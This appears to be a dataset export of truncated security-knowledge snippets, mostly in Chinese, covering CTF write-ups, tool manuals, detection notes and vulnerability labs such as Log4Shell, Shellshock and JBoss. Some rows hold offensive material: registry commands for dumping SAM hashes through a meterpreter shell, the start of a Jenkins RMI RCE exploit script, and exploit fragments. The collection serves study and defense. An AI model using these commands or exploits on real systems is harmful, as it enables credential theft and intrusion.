text
stringlengths
100
9.93M
category
stringclasses
11 values
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>CVE-2022-22978</title> </head> <body> Forbidden / Access denied </body> </html>
sec-knowleage
# Collision course In this task, we were given a hasher binary (`foobar`) and a file, for which we had to find a collision (`collider`), that is a file, which passed as input to `foobar` gives the same hash. There could be many solutions, but only one of them makes sense (is an English text). Analyzing the assembly, we...
sec-knowleage
很多环境下,不允许上传或者使用 mimikatz。而针对非域控的单机离线提取 hash 显得尤为重要。 在 meterpreter shell 命令切到交互式 cmd 命令。 ![](media/647ac3d1d83b7d7711b2cfd0ce18f1d5.jpg) reg save 方式使得需要下载的目标机hash文件更小。 * reg save HKLM\SYSTEM sys.hiv * reg save HKLM\SAM sam.hiv * reg save hklm\security security.hiv ![](media/cebaa1fc93231bc1aaf7738c222b5ac6.jpg...
sec-knowleage
# re5 (re, 120pts) ```bash michal@DESKTOP-U3SJ9VI:/mnt/c/Users/nazyw/Downloads$ file ctfq.exe ctfq.exe: PE32 executable (console) Intel 80386, for MS Windows ``` The binary is rather simple, it offers us 2 possibilities: ```c++ int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // ecx FILE *...
sec-knowleage
# CTF --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- ## 大纲 * **[大型赛事Writeup](#大型赛事writeup)** * [部委&公安&网信](#部委&公安&网信) * [CNAS](#CNAS) * [ISG](#ISG) * [虎符杯](#虎符杯) * [强网杯](#强网杯) * [网鼎杯](#网鼎杯) * [羊城杯](#羊城杯) * [美亚杯](#美亚杯) * [湖湘杯](#湖湘杯)...
sec-knowleage
## MobSF概述 移动安全框架,支持:静态分析APK、IPA、APPX文件,动态分析APK与分析Web API。 [github地址](https://github.com/MobSF/Mobile-Security-Framework-MobSF) ## 安装与使用 ### Centos7安装MobSF ``` # 安装java环境 yum install java-1.8.0-openjdk.x86_64 java-1.8.0-openjdk-devel.x86_64 -y # 安装python3 yum install https://centos7.iuscommunity.org/ius-release.rpm -y ...
sec-knowleage
# 语言安全 --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **相关文章** - [Go和Python的源码安全保护](https://ichxxx.cn/2021/01/06/code_protection_in_go_and_python/) **加壳** - [upx/upx](https://github.com/upx/upx) - the Ultimate Packer for eXecutables ``` upx 1.exe upx -d 1.exe ``` **代码扫描** - [IAST 工...
sec-knowleage
'\" t .TH "NETWORKD\&.CONF" "5" "" "systemd 231" "networkd.conf" .\" ----------------------------------------------------------------- .\" * Define some portability stuff .\" ----------------------------------------------------------------- .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\" http:...
sec-knowleage
code = ''' rlwinm r8, r27, 0xc, 5, 0x1a subfic r3, r9, 0x7320 stwu r1, -0x30(r1) stw r31, 0x2c(r1) mr r31, r1 li r3, 0 stw r3, 0x28(r31) li r3, 0x78ea stw r3, 0x24(r31) li ...
sec-knowleage
import sys from pwn import * from Crypto.Cipher import AES import os import struct CIPHER = "\xC8\x56\xF9\x5D\x1F\x6B\xCD\x27\x5C\xD8\x7E\x91\xA8\x90\xA3\x1D\x49\x5e\xc0\x92\x29\x43\xb7\xb9\x9a\xb1\x49\x1e\x88\x4f\x16\x8e" def genkey(payload): key = os.urandom(16) aes = AES.new(key, AES.MODE_ECB) decp = a...
sec-knowleage
# CVE-2021-44228 Log4Shell > Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers w...
sec-knowleage
## Babyfirst (web, 100p, ?? solves) > baby, do it first. > http://52.68.245.164 ### PL [ENG](#eng-version) Po połączeniu się pod podany url wyświetla się nam taka strona: ```php <?php highlight_file(__FILE__); $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR']; if ( !file_exists($dir) ) mkdir($dir); c...
sec-knowleage
elm === 纯文本邮件客户端程序 ## 补充说明 **elm命令** 是一个E-mail客户端管理程序,它提供了纯文本交互式全屏幕界面。 ### 语法 ```shell elm(选项) ``` ### 选项 ```shell -s<邮件主题>:指定新邮件的邮件主题; -f<目录>:开启程序时,读取指定的目录; -h:显示帮助; -i<文件名>:将文件内容插入送出的邮件中; -m:进入elm后,不显示指令说明; -v:显示elm的版本信息; -z:若收件信箱没有邮件,则不启动elm程序。 ```
sec-knowleage
# Hello World Misc, 339 points ## Description: > My first program! The source code of a cpp file was attached. ## Solution: Upon first inspection, the source code seems very innocent: ```c++ #include <iostream> using namespace std; int main() { cout << "Hello, Worlds!\n"; return 0; } ``` However, the source code itse...
sec-knowleage
### reGeorg简介: reGeorg 的前身是2008年 SensePost 在 BlackHat USA 2008 的 reDuh 延伸与扩展。也是目前安全从业人员使用最多,范围最广,支持多丰富的一款 http 隧道。从本质上讲,可以将 JSP/PHP/ASP/ASPX 等页面上传到目标服务器,便可以访问该服务器后面的主机。 2014年blackhat介绍 https://www.blackhat.com/eu-14/arsenal.html#regeorg Github: https://github.com/sensepost/reGeorg **攻击机:** 192.168.1.5 Debian 19...
sec-knowleage
# 态势感知 本章节主要整理网络态势感知(CSA,Cyberspace Situation Awareness)相关的知识。 ## 什么是态势感知 首先于1995年,Endsley提出,主要指:在大规模网络环境中,对 能够引起网络态势发生变化的**安全要素**进行获取、理解、显示,并预测未来的发展趋势。[1] 从定义中可以看出,主要包含三个方面: - 感知层(Perception)—— 数据提取 - 感知和获取环境中的重要线索和元素 - 理解层(Comprehension)—— 理解分析 - 整合感知到的数据和信息,分析其相关性,进行建模和评估 - 预测层(Projection)—— 态势预测 - 基于对环境...
sec-knowleage
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\"******************************************************************* .\" .\" This file was generated with po4a. Translate the source file. .\" .\"******************************************************************* .TH SYNC 1 2022年9月 "GNU coreutils 9.1...
sec-knowleage
--- title: ASCII Code date: 2023-01-05 12:44:21 tags: - ASCII - code - Table categories: - Other intro: | This cheatsheet is a complete list of ASCII Code Table with their numbers and names. --- ASCII Code Table {.cols-1} --------------- ### ASCII Code Table | Symbol | Dec |...
sec-knowleage
# 论文日读:Last Line of Defense: Reliability Through Inducing Cyber Threat Hunting With Deception in SCADA Networks ## 概要 - Offensive Security: Towards Proactive Threat Hunting via Adversary Emulation - Last Line of Defense: Reliability Through Inducing Cyber Threat Hunting With Deception in SCADA Networks Abdul B...
sec-knowleage
# F4ceb00k 60s (Web 100) ``` WWWarmup challenge for your soul. http://10.13.37.11 ``` ###ENG [PL](#pl-version) In the task we get a webpage where we can put a User-Agent string and it seemingly tells us how many users used the same UA (which seems to be random data). Tampering with our own, real UA string we figure th...
sec-knowleage
# Unlink ## 原理 我们在利用 unlink 所造成的漏洞时,其实就是对 chunk 进行内存布局,然后借助 unlink 操作来达成修改指针的效果。 我们先来简单回顾一下 unlink 的目的与过程,其目的是把一个双向链表中的空闲块拿出来(例如 free 时和目前物理相邻的 free chunk 进行合并)。其基本的过程如下 下面我们首先介绍一下 unlink 最初没有防护时的利用方法,然后介绍目前利用 unlink 的方式。 ### 古老的 unlink 在最初 unlink 实现的时候,其实是没有对 chunk 的 size 检查和双向链表检查的,即没有如下检查代码。 ```c // 由于 P 已经在双向链表中,所以...
sec-knowleage
--- title: 一键接管控制台 --- ## 在阿里云上一键接管控制台 使用以下命令接管控制台 ```bash cf alibaba console ``` 接管控制台的时候默认会创建一个名称为 crossfire 的用户,如果想改成其他用户名可以使用 `-u` 参数 ```bash cf alibaba console -u teamssix ``` > 接管控制台需要当前访问凭证至少拥有 `AliyunRAMFullAccess` 权限。 打开浏览器,访问控制台登录地址,输入用户名 <img width="900" src="/img/1657286463.png"> 输入密码,点击登录 <img width="900" ...
sec-knowleage
### ARX: Add-Rotate-Xor概述 ARX 运算是如下 3 种基本运算的统称 - Add 有限域上的模加 - Rotate 循环移位 - Xor 异或 有许多常见的块加密算法在轮函数中只用到了这 3 种基本运算,典型例子如 Salsa20、Speck 等。另外 [IDEA](./idea.md) 也采用了类似的基本运算来构建加解密操作,不过以乘法代替了移位。 ### ARX: Add-Rotate-Xor优缺点 #### 优点 - 操作简单,运算速度快 - 执行时间为常数,可以避免基于时间的测信道攻击 - 组合后的函数表达能力足够强(参见下方例题) #### 缺点 - 在三种基本运算当中,Rotate、Xor 对于单...
sec-knowleage
--- title: 安全威胁情报简述 tags: [安全综合, 情报, 威胁情报] --- # 安全威胁情报简述 该篇文章内容主要来自[漏洞银行](https://www.bugbank.cn/)的公开课,主讲人是g3on。此篇主要为学习笔记,后续补充了一些内容,如有侵权请告知。 ## 安全威胁情报简述 ### 什么是安全情报? #### 从情报的类型上来看 可以分为:资产情报、事件情报、漏洞情报和威胁情报。 注意,我们常说的威胁情报,并不完全等同于安全情报。 四大类信息[2] - 资产情报:主要用于确认企业自身的资产 - e.g. 企业自身的数据SOC、SIEM数据日志、告警等。 - 资产情报如何搜集? - 主要...
sec-knowleage
# T1548-003-linux-CVE-2019-14287 ## 来自ATT&CK的描述 sudoers文件`/etc/sudoers`描述了哪些用户可以运行哪些命令以及从哪些终端运行。这还描述了用户可以作为其他用户或组运行的命令。这提供了最小特权的概念,使得用户在大多数时间以最低可能的权限运行,并且仅在需要时提升到其他用户或权限,通常通过提示输入密码。但是,sudoers文件还可以指定何时不提示用户输入类似`user1 ALL=(ALL) NOPASSWD: ALL` [[1\]](https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malwar...
sec-knowleage
# 为 代码安全指南 作出贡献 欢迎 [提出问题或建议](issues) 或 [提交合并请求](pulls),建议在为项目作出贡献时,阅读以下指南。 ### I. Commit Mesage 编写指引 为便于索引,Commit Message应包括三个部分:Header(必需),Body(可选)和 Footer(可选)。 ```html <type>(<scope>): <subject> // 空一行 <body> // 空一行 <footer> ``` **Header 部分**只有一行,包括三个字段:type(必需)、scope(可选)和subject(必需)。 > type 用于说明 commit 的类别,可使用下面3个标识...
sec-knowleage
原文 by wooyun ## 0x00 测试环境 centos6.5+apache2.2.15+php5.3.3 ## 0x01 php的运行模式介绍 php的运行模式分四种: 1. CGI通用网关接口 2. fast-cgi常驻型的CGI 3. cli命令行运行 4. web模块模式 一般情况下,apache使用web模块模式运行php ## 0x02 Apache运行原理介绍 Apache是基于模块化设计的,各个模块在系统启动的时候按需载入。Apache对于php的解析,就是通过众多Module中的php Module来完成的。 ![](../pictures/apacheconf1.png) ...
sec-knowleage
pushd === 将目录添加到目录堆栈顶部。 ## 概要 ```shell pushd [-n] [+N | -N | dir] ``` ## 主要用途 - 将目录添加到目录堆栈顶部,切换当前工作目录到该目录。 - 旋转目录堆栈,使堆栈的新顶部成为当前工作目录。 - 没有参数时,交换目录堆栈的前两个目录。 ## 选项 ```shell -n 抑制添加目录引起的当前工作目录变化。 ``` ## 参数 +N(可选):不带参数执行`dirs`命令显示的列表中,左起的第N个目录将作为堆栈顶部,在它前面的会移动到底部。(从0开始计数) -N(可选):不带参数执行`dirs`命令显示的列表中,右起的第N个目录将作为堆栈顶部,在它前面的会...
sec-knowleage
## unholy (reversing, 4 points, 68 solves) python or ruby? why not both! In this task we got a Ruby program, refering to shared library unholy.so. The program mixed Ruby and Python code (and native code from the library). Quick analysis of `main.rb` file showed that the program had a basic structure of typical keygen...
sec-knowleage
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\"******************************************************************* .\" .\" This file was generated with po4a. Translate the source file. .\" .\"******************************************************************* .TH STTY 1 2022年9月 "GNU coreutils 9.1...
sec-knowleage
.\" Automatically generated by Pod::Man v1.37, Pod::Parser v1.14 .\" .\" Standard preamble: .\" ======================================================================== .de Sh \" Subsection heading .br .if t .Sp .ne 5 .PP \fB\\$1\fR .PP .. .de Sp \" Vertical space (when we can't use .PP) .if t .sp .5v .if n .sp .. .de ...
sec-knowleage
.\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH "PG_CONFIG" "1" "2003-11-02" "Application" "PostgreSQL Server Applications" .SH NAME pg_config \- 检索已安装版本的 PostgreSQL 的信息 .SH SYNOPSIS .sp pg_config {--bindir | --includedir | --includedir-server | --libdir | --pkglibdir | --configure | --version...} .SH "DESC...
sec-knowleage
.\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH "UPDATE" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands" .SH NAME UPDATE \- 更新一个表中的行 .SH SYNOPSIS .sp .nf UPDATE [ ONLY ] \fItable\fR SET \fIcolumn\fR = { \fIexpression\fR | DEFAULT } [, ...] [ FROM \fIfromlist\fR ] [ WHERE \fIcondition\fR ...
sec-knowleage
### 早期 CTF 竞赛介绍 第一个 CTF 比赛(1996 年-2001年),没有明确的比赛规则,没有专业搭建的比赛平台与环境。由参赛队伍各自准备比赛目标(自行准备与防守比赛目标,并要尝试攻破对方的比赛目标)。而组织者大都只是一些非专业的志愿者,接受参赛队伍手工计分的请求。 没有后台自动系统支持和裁判技术能力认定,计分延迟和误差以及不可靠的网络和不当的配置,导致比赛带来了极大的争论与不满。 ### 「现代」CTF 竞赛介绍 由专业队伍承担比赛平台、命题、赛事组织以及自动化积分系统。参赛队伍需提交参赛申请,由 DEFCON 会议组织者们进行评选。 就 LegitBS 组织的三年 DEFCON CTF 比赛而言,有以下突出特点: -...
sec-knowleage
## Mindblown (Crypto) ###ENG [PL](#pl-version) We are given authentication logic running on the server: ``` var express = require('express'); var app = express(); var port = process.env.PORT || 9898; var crypto = require('crypto'); var bodyParser = require('body-parser') var salt = 'somestring'; var iteration = /// som...
sec-knowleage
# Graylog日志管理系统 [官网地址](https://www.graylog.org/) [官方文档](http://docs.graylog.org/) ## 安装与使用 ### 安装graylog * **解决依赖** ``` # java>=8 yum install java-1.8.0-openjdk.x86_64 java-1.8.0-openjdk-devel.x86_64 -y # MongoDB>=2.4 yum install epel-release -y yum install mongodb.x86_64 mongodb-server.x86_64 -y # 启动MongoDB systemctl ...
sec-knowleage
'\" t .TH "LOCALECTL" "1" "" "systemd 231" "localectl" .\" ----------------------------------------------------------------- .\" * Define some portability stuff .\" ----------------------------------------------------------------- .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\" http://bugs.deb...
sec-knowleage
# DNS Zone Transfers (AXFR) [中文版本(Chinese version)](README.zh-cn.md) DNS zone transfers using the AXFR protocol are the simplest mechanism to replicate DNS records across DNS servers. To avoid the need to edit information on multiple DNS servers, you can edit information on one server and use AXFR to copy information...
sec-knowleage
# Rsa padding (Crypto, 303p, 47 solved) In the task we can connect to a netcat service which gives us the crypto source code: ```python #!/usr/bin/env python3 # -*- coding=utf-8 -*- from Crypto.Util.number import getPrime, GCD, bytes_to_long from hashlib import sha256 import random import signal import sys, os signal.a...
sec-knowleage
### CREATE2概述 `CREATE2` 是以太坊在“君士坦丁堡”这次硬分叉升级中引入的一个新操作码,不同于 `CREATE`,它使用新的方式来计算合约地址,让生成的合约地址更具有可控性。通过 `CREATE2` 可以延伸出很多有意思的玩法,在 CTF 中最常见的就是利用这种可控性,在同一个地址先后部署字节码完全不同的合约。 ### CREATE原理 如果利用外部账户或者使用 `CREATE` 操作码的合约账户创建一个合约,那么很容易就能确定被创建合约的地址。每个账户都有一个与之关联的 `nonce`:对外部账户而言,每发送一个交易,`nonce` 就会随之 `+1`;对合约账户而言,每创建一个合约,`nonce` 就会随之 ...
sec-knowleage
# Relatively Secure Algorithm Category: Cryptography, 100 points ## Description > We found this file on one of the faculty's computers, can you figure out what it is? ``` n: 64688515842284381671285004713804057636974557043123767909276429885604529285055404207075465905227143695430455279800518929093831790936189708370062485...
sec-knowleage
# Modus Tollens Category: Reversing, 100 Points ## Description > Remember your training, > > keep calm and carry on. > > A binary file was attached. ## Solution Let's run the attached binary: ```console root@kali:/media/sf_CTFs/matrix/Modus_Tollens# ./modus_tollens Enter flag: test Checking ... Wrong! try again... `...
sec-knowleage
# JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504) Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 参考: - https://github.com/joaomatosf/JavaDeserH2HC - https://www.youtube.com/watch?v=jVMr4eeJ...
sec-knowleage
<?php include 'common.php'; if(isset($_POST['submit']) && isset($_POST['width']) && isset($_POST['height'])) { $width = (int)$_POST['width']; $height = (int)$_POST['height']; if($width <= 0 || $width > MAX_IM_SIZE) { fatal('Invalid width'); } else if($height <= 0 || $height > MAX_IM_SIZE) { ...
sec-knowleage
# T1562-001-windows-停止Windows防御服务 ## 来自ATT&CK的描述 攻击者可能试图阻止由监测软件或进程捕获到的告警,以及事件日志被收集和分析。这可能包括修改配置文件或注册表项中的监测软件的设置,以达到逃避追踪的目的。 间谍软件和恶意软件仍然是一个严重的问题,微软开发了安全服务即Windows Defender和Windows防火墙,协助用户对抗这种威胁。如果关闭Windows Defender或Windows防火墙,应当引起管理员的注意,立即恢复windows Defender或windows防火墙,使其处于正常工作状态,调查并确定异常情况是否由用户正常操作引起的。 ## 测试案例 windows 7 ...
sec-knowleage
# 14. 剪绳子 ## 题目链接 [牛客网](https://www.nowcoder.com/practice/57d85990ba5b440ab888fc72b0751bf8?tpId=13&tqId=33257&tab=answerKey&from=cyc_github) ## 题目描述 把一根绳子剪成多段,并且使得每段的长度乘积最大。 ```html n = 2 return 1 (2 = 1 + 1) n = 10 return 36 (10 = 3 + 3 + 4) ``` ## 解题思路 ### 贪心 尽可能得多剪长度为 3 的绳子,并且不允许有长度为 1 的绳子出现。如果出现了,就从已经切好长度为 3 的绳子中拿出...
sec-knowleage
--- title: Transmit date: 2022-11-23 16:23:31.695841 background: bg-[#646fed] label: Mac tags: - - mac categories: - Keyboard Shortcuts intro: | A visual cheat-sheet for the 62 keyboard shortcuts found in Transmit. This application is MacOS-only. --- Keyboard Shortcuts ------------------ ### Transmit ...
sec-knowleage
# GeoServer OGC Filter SQL注入漏洞(CVE-2023-25157) GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。 在版本2.22.1和2.21.4及以前,多个OGC表达式中均存在SQL注入漏洞。 参考链接: - <https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158> - <https://github.com/advisories/GHSA-7g5f-wrx8-5ccf> ## 漏洞环境 执...
sec-knowleage
.\" Copyright 1993 Rick Sladkey <jrs@world.std.com> .TH SHOWMOUNT 8 "11 August 1997" .SH NAME showmount \- 显示关于 NFS 服务器文件系统挂载的信息 .SH 总览 .ad l .B /usr/sbin/showmount .B "[\ \-adehv\ ]" .B "[\ \-\-all\ ]" .B "[\ \-\-directories\ ]" .B "[\ \-\-exports\ ]" .B "[\ \-\-help\ ]" .B "[\ \-\-version\ ]" .B "[\ host\ ]" .ad b .S...
sec-knowleage
# T1592-004-收集目标组织主机信息-客户端配置 ## 来自ATT&CK的描述 在入侵受害者之前,攻击者可能会收集有关受害者的客户端配置信息,这些信息可以在目标定位期间使用。有关客户端配置的信息可能包括各种详细信息和设置,包括操作系统/版本,虚拟化,体系结构(例如:32位或64位),语言或时区。 攻击者可以通过各种方式收集此信息,例如通过[主动扫描](https://contribute.knowledge.qihoo.net/detail/technique/T1595)(例如:主机名,服务器旗标,用户代理字符串)、 [钓鱼](https://contribute.knowledge.qihoo.net/detail/te...
sec-knowleage
### [第八十一课:基于白名单Rundll32.exe执行payload第十一季](../Chapter1/81-90/81_基于白名单Rundll32.exe执行payload第十一季.md) ### [第八十二课:基于白名单Odbcconf执行payload第十二季](../Chapter1/81-90/82_基于白名单Odbcconf执行payload第十二季.md) ### [第八十三课:基于白名单PsExec执行payload第十三季 ](../Chapter1/81-90/83_基于白名单PsExec执行payload第十三季.md) ### [第八十四课:基于白名单Forfiles执行payload第十四...
sec-knowleage
#! /usr/bin/env python2 #Jenkins CLI RMI Java Deserialization RCE (CVE-2015-8103) #Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits) #Made with <3 by @byt3bl33d3r from __future__ import print_function import requests from requests.packages.urllib3.exceptions import Insecur...
sec-knowleage
# CobaltStrike <p align="center"> <img src="../../../assets/img/logo/cobaltstrike.png" width="30%"> </p> --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **简介** Cobalt Strike 是一款常用于后渗透的神器,这个工具以团队作为主体,共享信息,拥有多种协议上线方式,集成了端口转发,端口扫描,socket 代理,提权,钓鱼等。除去自身功能外,Cobalt Strike 还利用了 Metasploit 和 Mimikatz 等...
sec-knowleage
### 块加密概述 所谓块加密就是每次加密一块明文,常见的加密算法有 - IDEA 加密 - DES 加密 - AES 加密 块加密也是对称加密。 其实,我们也可以把块加密理解一种特殊的替代密码,但是其每次替代的是一大块。而正是由于一大块,明文空间巨大,而且对于不同的密钥,我们无法做一个表进行对应相应的密文,因此必须得有 **复杂** 的加解密算法来加解密明密文。 而与此同时,明文往往可能很长也可能很短,因此在块加密时往往需要两个辅助 - padding,即 padding 到指定分组长度 - 分组加密模式,即明文分组加密的方式。 ### 块加密混淆基本策略 混淆,Confusion,将密文与密钥之间的统计关系变得尽可能复杂,使得攻...
sec-knowleage
--- title: K8s 介绍 --- <center><h1>K8s 介绍</h1></center> --- Kubernetes 又称 k8s,是 Google 在 2014 年开源的一个用来管理容器的平台,以下是 k8s 架构图。 <img width="1000" src="/img/1649993172.png"> k8s 主要由以下核心组件组成: - etcd 保存了整个集群的状态 - API Server 提供了资源操作的唯一入口,并提供认证、授权、访问控制、API 注册和发现等机制 - Controller Manager 负责维护集群的状态,比如故障检测、自动扩展、滚动更新等 - Scheduler 负...
sec-knowleage
# 安卓9版本抓包 ## 安装Magisk > 资源下载地址: > > https://pan.baidu.com/s/1ND1-16KU9HpQtZju7gK5Mw 密码:ovl0 > https://yunpan.360.cn/surl_yEe2hUuTvSJ 密码:7e88 > > https://cloud.189.cn/t/MnIF7rQbIVbe 密码:6c6a ### 准备 夜神模拟器选择Android 9版本进行打开。 ![image-20230302175334971](../../.gitbook/assets/image-20230302175334971.png) 启动root ![image-202303...
sec-knowleage
# Writeup Nuit du Hack CTF 2016 Quals Team: akrasuski1, c7f.m0d3, cr019283, mnmd21891, msm, nazywam, shalom ### Table of contents * [Catch me if you can (Forensics)](catch_me_if_you_can) * [Invest (Forensics)](invest) * [Matryoshka (Crackme)](matryoshka) * Secure File Reader (Exploit Me) * Toil33t (Crypto) * Trol...
sec-knowleage
# 域 <p align="center"> <img src="../../../../assets/img/banner/域.png" width="90%"> </p> > 注 : 笔记中拓扑图 xmind 源文件在其图片目录下 --- ## 大纲 * **[域的原理](#域的原理)** * **[域结构](#域结构)** * [单域](#单域) * [域树](#域树) * [域林](#域林) * [GC 全局编录](#gc) * [FSMO](#fsmo) * [域信任关系](#域信任关系) * **[DC 域控](#dc)** * [PDC 主...
sec-knowleage
'\" t .TH "BINFMT\&.D" "5" "" "systemd 231" "binfmt.d" .\" ----------------------------------------------------------------- .\" * Define some portability stuff .\" ----------------------------------------------------------------- .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\" http://bugs.deb...
sec-knowleage
'\" '\" Copyright (c) 1993 The Regents of the University of California. '\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" RCS: @(#) $Id: puts.n,v 1.2 2003/11/24 05:09:59 b...
sec-knowleage
# script me General Skills, 500 points ## Description: > Can you understand the language and answer the questions to retrieve the flag? ## Solution: Let's connect to the server: ``` root@kali:/media/sf_CTFs/pico/script_me# nc 2018shell3.picoctf.com 7866 Rules: () + () = ()() => [com...
sec-knowleage
# GlassFish 任意文件读取漏洞 ## 原理 参考文章:https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 java语言中会把`%c0%ae`解析为`\uC0AE`,最后转义为ASCCII字符的`.`(点)。利用`%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/`来向上跳转,达到目录穿越、任意文件读取的效果。 ## 漏洞复现 编译、运行测试环境 ``` docker compose build docker compose up -d ``` 环境运行后,...
sec-knowleage
# ArkCon 2020 Teaser ArkCon 2020 was canceled due to the COVID-19 global pandemic, and the only challenge released was a teaser: > Have you missed ArkCon? Check out our mini teaser! Just making sure you’re still in shape... > > http://0x7e4-challenge.com/ Visiting the website, we get a simple text box with the label ...
sec-knowleage
# Shellshock Remote Command Injection (CVE-2014-6271) [中文版本(Chinese version)](README.zh-cn.md) Build and run the vulnerable environment: ``` docker compose build docker compose up -d ``` When you visit `http://your-ip/` you should see two files: - safe.cgi - victim.cgi safe.cgi generated by the latest version o...
sec-knowleage
# T1584-003-盗取基础设施-虚拟专用服务器 ## 来自ATT&CK的描述 攻击者可能会盗取第三方的虚拟专用服务器(VPS),这些服务器可以在攻击目标期间使用。有各种云服务提供商将虚拟机或容器作为一种服务出售。攻击者可以盗取由第三方实体购买的VPS,作为基础设施的VPS,攻击者可以使其难以在物理上将行动与自己联系起来。 盗取的VPS用于攻击生命周期的后期阶段,如指挥和控制,攻击者受益于与更高声誉的云服务提供商相关的普遍性和信任,以便增加受感染的第三方的信任。 ## 测试案例 虚拟专用服务器(英语:Virtual private server,缩写为 VPS),是将一台服务器分割成多个虚拟专享服务器的服务。实现VPS的技术分为...
sec-knowleage
# XSS挑战-WalkThrough --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **知识点** - 无过滤 XSS (level 1) - 各种难度的构造闭合 XSS (level 2、3、4、5、6) - 各种难度的绕过过滤 XSS (level 2、3、4、5、6) - 双写拼接 XSS (level 7) - 实体编码+HTML 编码 XSS (level 8、9) - input 中的 XSS (level 10) - HTTP headers 头中的 XSS (level 11、12、13) - exif XSS (level...
sec-knowleage
### Re-Entrancy概述 重入攻击是智能合约中的经典攻击。以太坊 The DAO 项目遭受的重入攻击直接导致了以太坊(ETH)和以太坊经典(ETC)的硬分叉。 ### Re-Entrancy原理 假设有一个银行合约实现了以下取款功能,在 `balanceOf[msg.sender]` 充足时,合约会转账相应数量的以太币给调用者,并且将 `balanceOf` 减去相应值: ```solidity contract Bank { mapping(address => uint256) public balanceOf; ... function withdraw(uint256 amount) pub...
sec-knowleage
# 56. 数组中只出现一次的数字 ## 题目链接 [牛客网](https://www.nowcoder.com/practice/389fc1c3d3be4479a154f63f495abff8?tpId=13&tqId=11193&tab=answerKey&from=cyc_github) ## 题目描述 一个整型数组里除了两个数字之外,其他的数字都出现了两次,找出这两个数。 ## 解题思路 两个相等的元素异或的结果为 0,而 0 与任意数 x 异或的结果都为 x。 对本题给的数组的所有元素执行异或操作,得到的是两个不存在重复的元素异或的结果。例如对于数组 [x,x,y,y,z,k],x^x^y^y^z^k = 0^y^y^z...
sec-knowleage
tload === 显示系统负载状况 ## 补充说明 **tload命令** 以图形化的方式输出当前系统的平均负载到指定的终端。假设不给予终端机编号,则会在执行tload指令的终端机显示负载情形。 ### 语法 ```shell tload(选项)(参数) ``` ### 选项 ```shell -s:指定闲时的刻度; -d:指定间隔的时间(秒)。 ``` ### 参数 终端:指定显示信息的终端设备文件。 ### 实例 使用tload命令查看系统负载情况: ```shell tload -d 1 0.08, 0.02,0.01 0.04, 0.01, 0.00 0.04, 0.01, 0.00 0.04, 0.01,0.00...
sec-knowleage
# Speed-Net > 注 : 笔记中拓扑图 drawio 与 xmind 源文件在其图片目录下 --- ## 各种帧、报文格式 <p align="center"><b>IP 报文</b></p> <p align="center"> <img src="../../../assets/img/Integrated/Network/Speed-Net/1.png"> </p> <p align="center"><b>UDP 报文格式</b></p> <p align="center"> <img src="../../../assets/img/Integrated/Network/Speed-Net/2.p...
sec-knowleage
**Authors**: < [nixawk](https://github.com/nixawk) > ---- ## Execute metasploit vbs payload in cmd shell If you are a pentester/researcher, you may want to gain a meterpreter session from a cmd shell at sometimes, ex: (sqlmap --os-shell, or other tools). Ex: ``` $ ncat -l -p 4444 Microsoft Windows XP [Version 5.1.2600...
sec-knowleage
# T1550-002-windows-哈希传递 ## 来自ATT&CK的描述 攻击者可能会使用被盗的密码哈希来“传递哈希”,从而在环境中横向移动,从而绕过正常的系统访问控制。传递哈希(PtH)是一种无需访问用户的明文密码即可作为用户身份验证的方法。此方法绕过需要明文密码的标准身份验证步骤,而直接进入使用密码哈希的身份验证部分。在这种技术中,使用凭据访问技术可以捕获正在使用的帐户的有效密码哈希。捕获的哈希与PtH一起用于验证该用户身份。一旦通过身份验证,PtH可用于在本地或远程系统上执行操作。 具有KB2871997的Windows 7及更高版本需要有效的域用户凭据或RID 500管理员哈希。 ## 测试案例 passing the...
sec-knowleage
ftpwho === 显示当前每个ftp会话信息 ## 补充说明 **ftpwho命令** ftp服务器套件proftpd的工作指令,用于显示当前每个ftp会话信息。 ### 语法 ```shell ftpwho(选项) ``` ### 选项 ```shell -h:显示帮助信息; -v:详细模式,输出更多信息。 ```
sec-knowleage
